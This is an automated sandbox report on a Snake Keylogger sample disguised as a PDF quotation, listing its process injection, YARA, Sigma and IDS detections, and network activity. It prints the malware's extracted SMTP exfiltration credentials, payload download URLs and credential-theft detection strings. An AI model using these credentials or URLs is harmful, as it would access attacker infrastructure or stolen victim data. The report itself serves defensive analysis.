Edit tour

Windows Analysis Report
QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Overview

General Information

Sample name:	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe renamed because original name is a hash value
Original sample name:	QUOTATION_OCTQTRA071244PDF.scr.exe
Analysis ID:	1525547
MD5:	2841a5211dd5eee5bcc3c3048b5d00da
SHA1:	a3de07870057a11804c108ca3848b7cf28adbf6b
SHA256:	94226064206b06a63579726747ae6900e6b6335b03b4bb00baf6f9cb0cbb1318
Tags:	exescruser-abuse_ch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Creates a thread in another existing process (thread injection)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

QUOTATION_OCTQTRA071244#U00faPDF.scr.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe" MD5: 2841A5211DD5EEE5BCC3C3048B5D00DA)

aspnet_compiler.exe (PID: 7848 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" MD5: DF5419B32657D2896514B6A1D041FE08)

conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "rep3send@aoqiinflatables.com", "Password": "Zg^!Zy[?IKrs99@soltan", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2656855245.000001AE692A0000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x21908:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x24e3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000005.00000002.2654091935.000001AE0024B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14522:$a1: get_encryptedPassword 0x1480e:$a2: get_encryptedUsername 0x1432e:$a3: get_timePasswordChanged 0x14429:$a4: get_passwordField 0x14538:$a5: set_encryptedPassword 0x15b1c:$a7: get_logins 0x15a7f:$a10: KeyLoggerEventArgs 0x15718:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1be25:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b057:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b48a:$a4: \Orbitum\User Data\Default\Login Data 0x1c4c9:$a5: \Kometa\User Data\Default\Login Data
00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x150bd:$s1: UnHook 0x150c4:$s2: SetHook 0x150cc:$s3: CallNextHook 0x150d9:$s4: _hook
00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17dd4:$x1: $%SMTPDV$ 0x17e3a:$x2: $#TheHashHere%& 0x1943f:$x3: %FTPDV$ 0x19529:$x4: $%TelegramDv$ 0x15718:$x5: KeyLoggerEventArgs 0x15a7f:$x5: KeyLoggerEventArgs 0x19463:$m2: Clipboard Logs ID 0x19679:$m2: Screenshot Logs ID 0x19789:$m2: keystroke Logs ID 0x19a63:$m3: SnakePW 0x19651:$m4: \SnakeKeylogger\
00000000.00000002.1934071386.0000017A26210000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b60a:$a1: get_encryptedPassword 0x1b8f6:$a2: get_encryptedUsername 0x1b416:$a3: get_timePasswordChanged 0x1b511:$a4: get_passwordField 0x1b620:$a5: set_encryptedPassword 0x1cc04:$a7: get_logins 0x1cb67:$a10: KeyLoggerEventArgs 0x1c800:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1eebc:$x1: $%SMTPDV$ 0x1ef22:$x2: $#TheHashHere%& 0x20527:$x3: %FTPDV$ 0x20611:$x4: $%TelegramDv$ 0x1c800:$x5: KeyLoggerEventArgs 0x1cb67:$x5: KeyLoggerEventArgs 0x2054b:$m2: Clipboard Logs ID 0x20761:$m2: Screenshot Logs ID 0x20871:$m2: keystroke Logs ID 0x20b4b:$m3: SnakePW 0x20739:$m4: \SnakeKeylogger\
00000000.00000002.1922304917.0000017A0D6A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1922304917.0000017A0D856000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x1f30:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x5466:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x70788:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x73cbe:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000005.00000002.2654091935.000001AE00001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe PID: 7264	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 7848	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 7848	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 7848	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x161f0:$a1: get_encryptedPassword 0x3110d:$a1: get_encryptedPassword 0x164d2:$a2: get_encryptedUsername 0x313ef:$a2: get_encryptedUsername 0x16006:$a3: get_timePasswordChanged 0x30f23:$a3: get_timePasswordChanged 0x16101:$a4: get_passwordField 0x3101e:$a4: get_passwordField 0x16206:$a5: set_encryptedPassword 0x31123:$a5: set_encryptedPassword 0x18721:$a7: get_logins 0x3363e:$a7: get_logins 0x18684:$a10: KeyLoggerEventArgs 0x335a1:$a10: KeyLoggerEventArgs 0x1831d:$a11: KeyLoggerEventArgsEventHandler 0x3323a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: aspnet_compiler.exe PID: 7848	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1831d:$x5: KeyLoggerEventArgs 0x18684:$x5: KeyLoggerEventArgs 0x18cc4:$x5: KeyLoggerEventArgs 0x18ff8:$x5: KeyLoggerEventArgs 0x3323a:$x5: KeyLoggerEventArgs 0x335a1:$x5: KeyLoggerEventArgs 0x33be1:$x5: KeyLoggerEventArgs 0x33f15:$x5: KeyLoggerEventArgs 0x1a85d:$m2: Clipboard Logs ID 0x1a94f:$m2: Screenshot Logs ID 0x1a9a5:$m2: keystroke Logs ID 0x3577a:$m2: Clipboard Logs ID 0x3586c:$m2: Screenshot Logs ID 0x358c2:$m2: keystroke Logs ID 0x1aada:$m3: SnakePW 0x359f7:$m3: SnakePW 0x1a93b:$m4: \SnakeKeylogger\ 0x35858:$m4: \SnakeKeylogger\
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a26210000.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12722:$a1: get_encryptedPassword 0x12a0e:$a2: get_encryptedUsername 0x1252e:$a3: get_timePasswordChanged 0x12629:$a4: get_passwordField 0x12738:$a5: set_encryptedPassword 0x13d1c:$a7: get_logins 0x13c7f:$a10: KeyLoggerEventArgs 0x13918:$a11: KeyLoggerEventArgsEventHandler
5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a025:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19257:$a3: \Google\Chrome\User Data\Default\Login Data 0x1968a:$a4: \Orbitum\User Data\Default\Login Data 0x1a6c9:$a5: \Kometa\User Data\Default\Login Data
5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x132bd:$s1: UnHook 0x132c4:$s2: SetHook 0x132cc:$s3: CallNextHook 0x132d9:$s4: _hook
5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15fd4:$x1: $%SMTPDV$ 0x1603a:$x2: $#TheHashHere%& 0x1763f:$x3: %FTPDV$ 0x17729:$x4: $%TelegramDv$ 0x13918:$x5: KeyLoggerEventArgs 0x13c7f:$x5: KeyLoggerEventArgs 0x17663:$m2: Clipboard Logs ID 0x17879:$m2: Screenshot Logs ID 0x17989:$m2: keystroke Logs ID 0x17c63:$m3: SnakePW 0x17851:$m4: \SnakeKeylogger\
5.2.aspnet_compiler.exe.1ae100100e8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.1ae100100e8.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.aspnet_compiler.exe.1ae100100e8.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12722:$a1: get_encryptedPassword 0x12a0e:$a2: get_encryptedUsername 0x1252e:$a3: get_timePasswordChanged 0x12629:$a4: get_passwordField 0x12738:$a5: set_encryptedPassword 0x13d1c:$a7: get_logins 0x13c7f:$a10: KeyLoggerEventArgs 0x13918:$a11: KeyLoggerEventArgsEventHandler
5.2.aspnet_compiler.exe.1ae100100e8.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a025:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19257:$a3: \Google\Chrome\User Data\Default\Login Data 0x1968a:$a4: \Orbitum\User Data\Default\Login Data 0x1a6c9:$a5: \Kometa\User Data\Default\Login Data
5.2.aspnet_compiler.exe.1ae100100e8.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x132bd:$s1: UnHook 0x132c4:$s2: SetHook 0x132cc:$s3: CallNextHook 0x132d9:$s4: _hook
5.2.aspnet_compiler.exe.1ae100100e8.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15fd4:$x1: $%SMTPDV$ 0x1603a:$x2: $#TheHashHere%& 0x1763f:$x3: %FTPDV$ 0x17729:$x4: $%TelegramDv$ 0x13918:$x5: KeyLoggerEventArgs 0x13c7f:$x5: KeyLoggerEventArgs 0x17663:$m2: Clipboard Logs ID 0x17879:$m2: Screenshot Logs ID 0x17989:$m2: keystroke Logs ID 0x17c63:$m3: SnakePW 0x17851:$m4: \SnakeKeylogger\
5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14522:$a1: get_encryptedPassword 0x1480e:$a2: get_encryptedUsername 0x1432e:$a3: get_timePasswordChanged 0x14429:$a4: get_passwordField 0x14538:$a5: set_encryptedPassword 0x15b1c:$a7: get_logins 0x15a7f:$a10: KeyLoggerEventArgs 0x15718:$a11: KeyLoggerEventArgsEventHandler
5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1be25:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b057:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b48a:$a4: \Orbitum\User Data\Default\Login Data 0x1c4c9:$a5: \Kometa\User Data\Default\Login Data
5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x150bd:$s1: UnHook 0x150c4:$s2: SetHook 0x150cc:$s3: CallNextHook 0x150d9:$s4: _hook
5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17dd4:$x1: $%SMTPDV$ 0x17e3a:$x2: $#TheHashHere%& 0x1943f:$x3: %FTPDV$ 0x19529:$x4: $%TelegramDv$ 0x15718:$x5: KeyLoggerEventArgs 0x15a7f:$x5: KeyLoggerEventArgs 0x19463:$m2: Clipboard Logs ID 0x19679:$m2: Screenshot Logs ID 0x19789:$m2: keystroke Logs ID 0x19a63:$m3: SnakePW 0x19651:$m4: \SnakeKeylogger\
5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d63fc80.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14522:$a1: get_encryptedPassword 0x1480e:$a2: get_encryptedUsername 0x1432e:$a3: get_timePasswordChanged 0x14429:$a4: get_passwordField 0x14538:$a5: set_encryptedPassword 0x15b1c:$a7: get_logins 0x15a7f:$a10: KeyLoggerEventArgs 0x15718:$a11: KeyLoggerEventArgsEventHandler
5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1be25:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b057:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b48a:$a4: \Orbitum\User Data\Default\Login Data 0x1c4c9:$a5: \Kometa\User Data\Default\Login Data
5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x150bd:$s1: UnHook 0x150c4:$s2: SetHook 0x150cc:$s3: CallNextHook 0x150d9:$s4: _hook
5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17dd4:$x1: $%SMTPDV$ 0x17e3a:$x2: $#TheHashHere%& 0x1943f:$x3: %FTPDV$ 0x19529:$x4: $%TelegramDv$ 0x15718:$x5: KeyLoggerEventArgs 0x15a7f:$x5: KeyLoggerEventArgs 0x19463:$m2: Clipboard Logs ID 0x19679:$m2: Screenshot Logs ID 0x19789:$m2: keystroke Logs ID 0x19a63:$m3: SnakePW 0x19651:$m4: \SnakeKeylogger\
0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x70140:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x73676:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Click to see the 23 entries

Sigma Signatures

System Summary

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe", ParentImage: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, ParentProcessId: 7264, ParentProcessName: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", ProcessId: 7848, ProcessName: aspnet_compiler.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-04T11:24:22.825457+0200	2803305	3	Unknown Traffic	192.168.2.9	49715	188.114.96.3	443	TCP
2024-10-04T11:24:24.009850+0200	2803305	3	Unknown Traffic	192.168.2.9	49717	188.114.96.3	443	TCP
2024-10-04T11:24:26.636493+0200	2803305	3	Unknown Traffic	192.168.2.9	49721	188.114.96.3	443	TCP
2024-10-04T11:24:27.810889+0200	2803305	3	Unknown Traffic	192.168.2.9	49723	188.114.96.3	443	TCP
2024-10-04T11:24:30.202999+0200	2803305	3	Unknown Traffic	192.168.2.9	49727	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-04T11:24:21.381170+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49713	158.101.44.242	80	TCP
2024-10-04T11:24:22.240555+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49713	158.101.44.242	80	TCP
2024-10-04T11:24:23.417094+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49716	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000005.00000002.2654091935.000001AE00001000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "rep3send@aoqiinflatables.com", "Password": "Zg^!Zy[?IKrs99@soltan", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}

Multi AV Scanner detection for submitted file

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	ReversingLabs: Detection: 13%
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Virustotal: Detection: 27%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49714 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49709 version: TLS 1.2

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1934310097.0000017A26290000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D92A000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D9E4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1934310097.0000017A26290000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D92A000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D9E4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF887BDA235h	5_2_00007FF887BD9E4D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF887BD9C1Bh	5_2_00007FF887BD99B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF887BDA235h	5_2_00007FF887BDA151

Source: global traffic	HTTP traffic detected: GET /data-package/MlZtCPkK/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/LuTcDMs7R8e5 HTTP/1.1Host: s20.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /data-package/MlZtCPkK/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49713 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49716 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49727 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49715 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49723 -> 188.114.96.3:443
